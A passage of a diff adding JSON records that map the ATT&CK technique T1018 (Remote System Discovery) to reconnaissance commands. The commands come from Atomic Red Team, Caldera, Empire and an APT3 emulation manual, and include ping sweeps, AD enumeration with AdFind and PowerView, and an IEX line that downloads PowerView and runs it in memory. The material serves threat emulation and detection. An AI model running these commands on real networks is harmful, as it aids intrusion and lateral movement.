This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.secureworks.com/research/bronze-union", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + 
"https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1018", + "command_list": [ + "net group \"Domain Computers\" /domain[:DOMAIN]", + "net group \"Domain Computers\" /domain", + "\npost/windows/gather/enum_ad_computers\npost/windows/gather/enum_computers", + "net group \"Domain Controllers\" /domain[:DOMAIN]", + "net group \"Domain Controllers\" /domain", + "nltest /dclist[:domain]", + "echo %LOGONSERVER%", + "shell echo %LOGONSERVER%", + "net view /domain\nnet view\n", + "net group \"Domain Computers\" /domain\n", + "nltest.exe /dclist:%userdnsdomain%\n", + "for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i\n", + "arp -a\n", + "arp -a | grep -v '^?'\n", + "for ip in $(seq 1 #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo \"#{subnet}.$ip UP\" || : ; done\n", + "for ip in $(seq #{start_host} 254); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo \"#{subnet}.$ip UP\" || : ; done\n", + "for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 192.168.1.$ip; [ $? 
-eq 0 ] && echo \"192.168.1.$ip UP\" || : ; done\n", + "$localip = ((ipconfig | findstr [0-9].\\.)[0]).Split()[-1]\n$pieces = $localip.split(\".\")\n$firstOctet = $pieces[0]\n$secondOctet = $pieces[1]\n$thirdOctet = $pieces[2]\nforeach ($ip in 1..255 | % { \"$firstOctet.$secondOctet.$thirdOctet.$_\" } ) {cmd.exe /c nslookup $ip}\n", + "adidnsdump -u domain\\user -p #{acct_pass} --print-zones #{host_name}\n", + "adidnsdump -u #{user_name} -p password --print-zones #{host_name}\n", + "adidnsdump -u #{user_name} -p #{acct_pass} --print-zones 192.168.1.1\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=computer)\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -sc dclist\n", + "ip neighbour show\n", + "ip route show\n", + "ip tcp_metrics show |grep --invert-match \"^127\\.\"\n", + "$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher(\"(ObjectCategory=Computer)\")\n$DirectorySearcher.PropertiesToLoad.Add(\"Name\")\n$Computers = $DirectorySearcher.findall()\nforeach ($Computer in $Computers) {\n $Computer = $Computer.Properties.name\n if (!$Computer) { Continue }\n Write-Host $Computer}\n", + "Get-AdComputer -Filter *\n", + "([adsisearcher]\"objectcategory=computer\").FindAll(); ([adsisearcher]\"objectcategory=computer\").FindOne()\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose\n", + "get-wmiobject -class ds_computer -namespace root\\directory\\ldap", + "Import-Module .\\PowerView.ps1 -Force;\nGet-NetComputer\n", + "Import-Module .\\powerview.ps1;\nGet-DomainComputer\n", + "nltest /dsgetdc:%USERDOMAIN%\n", + "nltest /dsgetdc:$env:USERDOMAIN\n", + "cat ~/.ssh/known_hosts\n", + "arp -a", + "host \"#{target.org.domain}\" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev", + "(nslookup -querytype=mx #{target.org.domain}. 
| Select-String -pattern 'mail' | Out-String).Trim()\n", + "nslookup #{remote.host.ip}\n", + "nbtstat -A #{remote.host.ip}", + "net.exe view /domain", + "qwinsta.exe /server:", + "installutil.exe /logfile= /LogToConsole=false /U *.dll", + "powershell/situational_awareness/network/powerview/get_domain_controller", + "powershell/situational_awareness/network/powerview/get_domain_policy", + "powershell/situational_awareness/network/powerview/get_domain_trust", + "powershell/situational_awareness/network/powerview/get_forest", + "powershell/situational_awareness/network/powerview/get_forest_domain", + "powershell/situational_awareness/network/powerview/get_site", + "powershell/situational_awareness/network/reverse_dns", + "python/situational_awareness/network/active_directory/get_computers", + "python/situational_awareness/network/active_directory/get_domaincontrollers", + "python/situational_awareness/network/gethostbyname" + ], + "commands": [ + { + "command": "net group \"Domain Computers\" /domain[:DOMAIN]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "net group \"Domain Computers\" /domain", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "\npost/windows/gather/enum_ad_computers\npost/windows/gather/enum_computers", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "net group \"Domain Controllers\" /domain[:DOMAIN]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "net group \"Domain Controllers\" /domain", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "nltest /dclist[:domain]", + "source": 
"https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "echo %LOGONSERVER%", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell echo %LOGONSERVER%", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "net view /domain\nnet view\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "net group \"Domain Computers\" /domain\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "nltest.exe /dclist:%userdnsdomain%\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "arp -a\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "arp -a | grep -v '^?'\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "for ip in $(seq 1 #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo \"#{subnet}.$ip UP\" || : ; done\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "for ip in $(seq #{start_host} 254); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo \"#{subnet}.$ip UP\" || : ; done\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 192.168.1.$ip; [ $? 
-eq 0 ] && echo \"192.168.1.$ip UP\" || : ; done\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "$localip = ((ipconfig | findstr [0-9].\\.)[0]).Split()[-1]\n$pieces = $localip.split(\".\")\n$firstOctet = $pieces[0]\n$secondOctet = $pieces[1]\n$thirdOctet = $pieces[2]\nforeach ($ip in 1..255 | % { \"$firstOctet.$secondOctet.$thirdOctet.$_\" } ) {cmd.exe /c nslookup $ip}\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "adidnsdump -u domain\\user -p #{acct_pass} --print-zones #{host_name}\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "adidnsdump -u #{user_name} -p password --print-zones #{host_name}\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "adidnsdump -u #{user_name} -p #{acct_pass} --print-zones 192.168.1.1\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=computer)\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -sc dclist\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "ip neighbour show\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "ip route show\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "ip tcp_metrics show |grep --invert-match \"^127\\.\"\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + 
"command": "$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher(\"(ObjectCategory=Computer)\")\n$DirectorySearcher.PropertiesToLoad.Add(\"Name\")\n$Computers = $DirectorySearcher.findall()\nforeach ($Computer in $Computers) {\n $Computer = $Computer.Properties.name\n if (!$Computer) { Continue }\n Write-Host $Computer}\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "Get-AdComputer -Filter *\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "([adsisearcher]\"objectcategory=computer\").FindAll(); ([adsisearcher]\"objectcategory=computer\").FindOne()\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose\n", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "get-wmiobject -class ds_computer -namespace root\\directory\\ldap", + "source": "atomics/T1018/T1018.yaml", + "name": "Atomic Red Team Test - Remote System Discovery" + }, + { + "command": "Import-Module .\\PowerView.ps1 -Force;\nGet-NetComputer\n", + "source": "data/abilities/discovery/0360ede1-3c28-48d3-a6ef-6e98f562c5af.yml", + "name": "Get a list of all computers in a domain" + }, + { + "command": "Import-Module .\\powerview.ps1;\nGet-DomainComputer\n", + "source": "data/abilities/discovery/13379ae1-d20e-4162-91f8-320d78a35e7f.yml", + "name": "Use PowerView to query the Active Directory server for a list of computers in the Domain" + }, + { + "command": "nltest /dsgetdc:%USERDOMAIN%\n", + "source": "data/abilities/discovery/26c8b8b5-7b5b-4de1-a128-7d37fb14f517.yml", + 
"name": "Identify the remote domain controllers" + }, + { + "command": "nltest /dsgetdc:$env:USERDOMAIN\n", + "source": "data/abilities/discovery/26c8b8b5-7b5b-4de1-a128-7d37fb14f517.yml", + "name": "Identify the remote domain controllers" + }, + { + "command": "cat ~/.ssh/known_hosts\n", + "source": "data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml", + "name": "View the known_hosts file" + }, + { + "command": "arp -a", + "source": "data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml", + "name": "Locate all active IP and FQDNs on the network" + }, + { + "command": "host \"#{target.org.domain}\" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev", + "source": "data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml", + "name": "Identify the organizations mail server" + }, + { + "command": "(nslookup -querytype=mx #{target.org.domain}. | Select-String -pattern 'mail' | Out-String).Trim()\n", + "source": "data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml", + "name": "Identify the organizations mail server" + }, + { + "command": "nslookup #{remote.host.ip}\n", + "source": "data/abilities/discovery/fa4ed735-7006-4451-a578-b516f80e559f.yml", + "name": "Find hostname of remote IP in domain" + }, + { + "command": "nbtstat -A #{remote.host.ip}", + "source": "data/abilities/discovery/fdf8bf36-797f-4157-805b-fe7c1c6fc903.yml", + "name": "Find hostname of remote host" + }, + { + "command": "net.exe view /domain", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "qwinsta.exe /server:", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "installutil.exe /logfile= /LogToConsole=false /U *.dll", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_domain_controller", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + 
{ + "command": "powershell/situational_awareness/network/powerview/get_domain_policy", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_domain_trust", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_forest", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_forest_domain", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_site", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/reverse_dns", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/get_computers", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/get_domaincontrollers", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/gethostbyname", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + 
"parsed_datasets": [ + { + "Category": "T1018", + "Built-in Windows Command": "net group \"Domain Computers\" /domain[:DOMAIN]", + "Cobalt Strike": "net group \"Domain Computers\" /domain", + "Metasploit": "\npost/windows/gather/enum_ad_computers\npost/windows/gather/enum_computers", + "Description": "Display the list of domain computers in the domain by showing their computer accounts (COMP_NAME$)" + }, + { + "Category": "T1018", + "Built-in Windows Command": "net group \"Domain Controllers\" /domain[:DOMAIN]", + "Cobalt Strike": "net group \"Domain Controllers\" /domain", + "Metasploit": "", + "Description": "Display the list of domain controllers in the network" + }, + { + "Category": "T1018", + "Built-in Windows Command": "nltest /dclist[:domain]", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "Display the trust relationship between the workstation and the domain - must be elevated to use this!" + }, + { + "Category": "T1018", + "Built-in Windows Command": "echo %LOGONSERVER%", + "Cobalt Strike": "shell echo %LOGONSERVER%", + "Metasploit": "", + "Description": "Display the active directory login server of the workstation " + }, + { + "attack_technique": "T1018", + "display_name": "Remote System Discovery", + "atomic_tests": [ + { + "name": "Remote System Discovery - net", + "auto_generated_guid": "85321a9c-897f-4a60-9f20-29788e50bccd", + "description": "Identify remote systems with net.exe.\n\nUpon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net view /domain\nnet view\n", + "name": "command_prompt" + } + }, + { + "name": "Remote System Discovery - net group Domain Computers", + "auto_generated_guid": "f1bf6c8f-9016-4edf-aff9-80b65f5d711f", + "description": "Identify remote systems with net.exe querying the Active Directory Domain Computers group.\n\nUpon successful 
execution, cmd.exe will execute cmd.exe against Active Directory to list the \"Domain Computers\" group. Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net group \"Domain Computers\" /domain\n", + "name": "command_prompt" + } + }, + { + "name": "Remote System Discovery - nltest", + "auto_generated_guid": "52ab5108-3f6f-42fb-8ba3-73bc054f22c8", + "description": "Identify domain controllers for specified domain.\n\nUpon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target_domain": { + "description": "Domain to query for domain controllers", + "type": "String", + "default": "%userdnsdomain%" + } + }, + "executor": { + "command": "nltest.exe /dclist:#{target_domain}\n", + "name": "command_prompt" + } + }, + { + "name": "Remote System Discovery - ping sweep", + "auto_generated_guid": "6db1f57f-d1d5-4223-8a66-55c9c65a9592", + "description": "Identify remote systems via ping sweep.\n\nUpon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i\n", + "name": "command_prompt" + } + }, + { + "name": "Remote System Discovery - arp", + "auto_generated_guid": "2d5a61f5-0447-4be4-944a-1f8530ed6574", + "description": "Identify remote systems via arp. \n\nUpon successful execution, cmd.exe will execute arp to list out the arp cache. 
Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "arp -a\n", + "name": "command_prompt" + } + }, + { + "name": "Remote System Discovery - arp nix", + "auto_generated_guid": "acb6b1ff-e2ad-4d64-806c-6c35fe73b951", + "description": "Identify remote systems via arp.\n\nUpon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if arp command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v arp)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "(which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)\n" + } + ], + "executor": { + "command": "arp -a | grep -v '^?'\n", + "name": "sh" + } + }, + { + "name": "Remote System Discovery - sweep", + "auto_generated_guid": "96db2632-8417-4dbb-b8bb-a8b92ba391de", + "description": "Identify remote systems via ping sweep.\n\nUpon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "start_host": { + "description": "Subnet used for ping sweep.", + "type": "String", + "default": "1" + }, + "stop_host": { + "description": "Subnet used for ping sweep.", + "type": "String", + "default": "254" + }, + "subnet": { + "description": "Subnet used for ping sweep.", + "type": "String", + "default": "192.168.1" + } + }, + "executor": { + "command": "for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? 
-eq 0 ] && echo \"#{subnet}.$ip UP\" || : ; done\n", + "name": "sh" + } + }, + { + "name": "Remote System Discovery - nslookup", + "auto_generated_guid": "baa01aaa-5e13-45ec-8a0d-e46c93c9760f", + "description": "Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig.\n\nUpon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$localip = ((ipconfig | findstr [0-9].\\.)[0]).Split()[-1]\n$pieces = $localip.split(\".\")\n$firstOctet = $pieces[0]\n$secondOctet = $pieces[1]\n$thirdOctet = $pieces[2]\nforeach ($ip in 1..255 | % { \"$firstOctet.$secondOctet.$thirdOctet.$_\" } ) {cmd.exe /c nslookup $ip}\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Remote System Discovery - adidnsdump", + "auto_generated_guid": "95e19466-469e-4316-86d2-1dc401b5a959", + "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks\nPython 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test.\nSuccessful execution of this test will list dns zones in the terminal.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user_name": { + "description": "username including domain.", + "type": "String", + "default": "domain\\user" + }, + "acct_pass": { + "description": "Account password.", + "type": "String", + "default": "password" + }, + "host_name": { + "description": "hostname or ip address to connect to.", + "type": "String", + "default": "192.168.1.1" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must have python 3 installed\n", + "prereq_command": "if (python --version) {exit 0} else {exit 1}\n", + 
"get_prereq_command": "echo \"Python 3 must be installed manually\"\n" + }, + { + "description": "Computer must have pip installed\n", + "prereq_command": "if (pip3 -V) {exit 0} else {exit 1}\n", + "get_prereq_command": "echo \"PIP must be installed manually\"\n" + }, + { + "description": "adidnsdump must be installed and part of PATH\n", + "prereq_command": "if (cmd /c adidnsdump -h) {exit 0} else {exit 1}\n", + "get_prereq_command": "pip3 install adidnsdump\n" + } + ], + "executor": { + "command": "adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Adfind - Enumerate Active Directory Computer Objects", + "auto_generated_guid": "a889f5be-2d54-4050-bd05-884578748bb4", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects\nreference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -f (objectcategory=computer)\n", + "name": "command_prompt" + } + }, + { + "name": "Adfind - Enumerate Active Directory Domain Controller Objects", + "auto_generated_guid": 
"5838c31e-a0e2-4b9f-b60a-d79d2cb7995e", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects\nreference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -sc dclist\n", + "name": "command_prompt" + } + }, + { + "name": "Remote System Discovery - ip neighbour", + "auto_generated_guid": "158bd4dd-6359-40ab-b13c-285b9ef6fa25", + "description": "Use the ip neighbour command to display the known link layer (ARP table) addresses for hosts sharing the same network segment. 
\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if ip command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v ip)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "apt-get install iproute2 -y\n" + } + ], + "executor": { + "command": "ip neighbour show\n", + "name": "sh" + } + }, + { + "name": "Remote System Discovery - ip route", + "auto_generated_guid": "1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1", + "description": "Use the ip route command to display the kernels routing tables. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if ip command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v ip)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "apt-get install iproute2 -y\n" + } + ], + "executor": { + "command": "ip route show\n", + "name": "sh" + } + }, + { + "name": "Remote System Discovery - ip tcp_metrics", + "auto_generated_guid": "6c2da894-0b57-43cb-87af-46ea3b501388", + "description": "Use the ip tcp_metrics command to display the recent cached entries for IPv4 and IPv6 source and destination addresses. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if ip command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v ip)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "apt-get install iproute2 -y\n" + } + ], + "executor": { + "command": "ip tcp_metrics show |grep --invert-match \"^127\\.\"\n", + "name": "sh" + } + }, + { + "name": "Enumerate domain computers within Active Directory using DirectorySearcher", + "auto_generated_guid": "962a6017-1c09-45a6-880b-adc9c57cb22e", + "description": "This test is a Powershell script that enumerates Active Directory to determine computers that are joined to the domain. 
\nThis test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement. \nReference: [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks). \nUpon successful execution, this test will output the names of the computers that reside on the domain to the console window. \n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "This PC must be joined to a domain.", + "prereq_command": "if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}\t\t", + "get_prereq_command": "write-host \"This PC must be manually added to a domain.\" " + } + ], + "executor": { + "command": "$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher(\"(ObjectCategory=Computer)\")\n$DirectorySearcher.PropertiesToLoad.Add(\"Name\")\n$Computers = $DirectorySearcher.findall()\nforeach ($Computer in $Computers) {\n $Computer = $Computer.Properties.name\n if (!$Computer) { Continue }\n Write-Host $Computer}\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Enumerate Active Directory Computers with Get-AdComputer", + "auto_generated_guid": "97e89d9e-e3f5-41b5-a90f-1e0825df0fdf", + "description": "The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.\nUpon successful execution a listing of Computers will output with their paths in AD.\nReference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "Get-AdComputer -Filter *\n" + } + }, + { + "name": "Enumerate Active Directory Computers with ADSISearcher", + 
